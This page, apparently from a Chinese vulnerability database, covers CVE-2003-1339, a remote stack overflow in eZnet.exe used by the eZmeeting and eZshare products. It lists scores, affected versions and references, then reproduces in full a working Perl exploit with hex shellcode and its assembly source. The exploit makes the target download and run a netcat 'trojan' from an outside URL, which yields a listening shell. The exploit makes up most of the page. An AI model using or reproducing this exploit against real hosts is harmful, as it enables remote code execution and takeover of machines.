CVE-2003-1339
CVSS10.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOE    

[原文]Stack-based buffer overflow in eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork, and (d) eZshare allows remote attackers to cause a denial of service (crash) or execute arbitrary code, as demonstrated via (1) a long GET request and (2) a long operation or autologin parameter to SwEzModule.dll.


[CNNVD]@EZmeeting EZmeeting EZmeeting 缓冲区溢出漏洞(CNNVD-200312-279)

        eZ(a)eZphotoshare,(b)eZmeeting,(c)eZnetwork,和(d)eZshare中使用的eZnet.exe存在基于堆栈的缓冲区溢出漏洞。远程攻击者借助(1)超长GET请求和(2)超长操作或者SwEzModule.dll的autologin参数导致服务拒绝(崩溃)或者执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:ezmeeting:ezmeeting:3.5
cpe:/a:ezmeeting:ezmeeting:3.4
cpe:/a:ezmeeting:ezmeeting:3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1339
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1339
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-279
(官方数据源) CNNVD

- 其它链接及资源

http://www.milw0rm.com/exploits/133
(UNKNOWN)  MILW0RM  133
http://www.governmentsecurity.org/archive/t5390.html
(UNKNOWN)  MISC  http://www.governmentsecurity.org/archive/t5390.html
http://securitytracker.com/id?1008412
(UNKNOWN)  SECTRACK  1008412
http://seclists.org/bugtraq/2003/Dec/0195.html
(UNKNOWN)  BUGTRAQ  20031211 eZ and eZphotoshare fixes
http://marc.info/?l=bugtraq&m=107090390002654&w=2
(UNKNOWN)  BUGTRAQ  20031207 eZ Multiple Packages Stack Overflow Vulnerability

- 漏洞信息

@EZmeeting EZmeeting EZmeeting 缓冲区溢出漏洞
危急 缓冲区溢出
2003-12-31 00:00:00 2007-09-26 00:00:00
远程  
        eZ(a)eZphotoshare,(b)eZmeeting,(c)eZnetwork,和(d)eZshare中使用的eZnet.exe存在基于堆栈的缓冲区溢出漏洞。远程攻击者借助(1)超长GET请求和(2)超长操作或者SwEzModule.dll的autologin参数导致服务拒绝(崩溃)或者执行任意代码。

- 公告与补丁

        

- 漏洞信息 (133)

Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit (EDBID:133)
windows remote
2003-12-15 Verified
80 Peter Winter-Smith
N/A [点击下载]
#!/usr/bin/perl -w
# 
# Stack Overflow in eZnet.exe - Remote Exploit
# 
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
# 
# For this exploit I have tried several strategies to increase
# reliability and performance:
# 
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
# 
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
      " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
      " + listens on port 9999.\n\n";
exit;
}

print "eZnet.exe remote trojan downloader exploit\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port 80";

$tlen = chr(length($ARGV[1]) + 1);

$shellcode =            "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
                        "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
                        "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
                        "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
                        "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
                        "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
                                                    $tlen  .
                            "\x57\x8D\x7F\x09\x47\x57\x8D" .
                        "\x54\x24\x14\x52\xEB\x02\xEB\x52" .
                        "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
                        "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
                        "\x36\x50\xFF\x15\xCC\x90\x04\x10" .
                        "\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
                        "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
                        "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
                        "\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
                        "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
                        "\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
                        "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
                        "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
                        "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
                        "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
                        "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
                        "\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
                        "\x45\x78\x65\x63\xFF" .  $ARGV[1] .
                                                    "\xFF" .
                        "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
                        "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
                        "\x33\x32\x2E\x64\x6C\x6C\xFF";

$jmpcode =              "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";

$eip = "\xBB\x33\x05\x10";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  "\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
                  
print $victim $packet;

print " + Making Request ...\n + Trojan should download - best of luck!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ;   (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# 
# bits 32
# 
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [100490cch]	; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [100490cch]	; GetProcAddress("kernel32.dll", WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------

#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [peter4020@hotmail.com]
# 
# ;100533BBh
# 
# bits 32
# 
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------




# milw0rm.com [2003-12-15]
		

- 漏洞信息

60387
eZ Multiple Products eZnet.exe GET Request Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-12-07 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站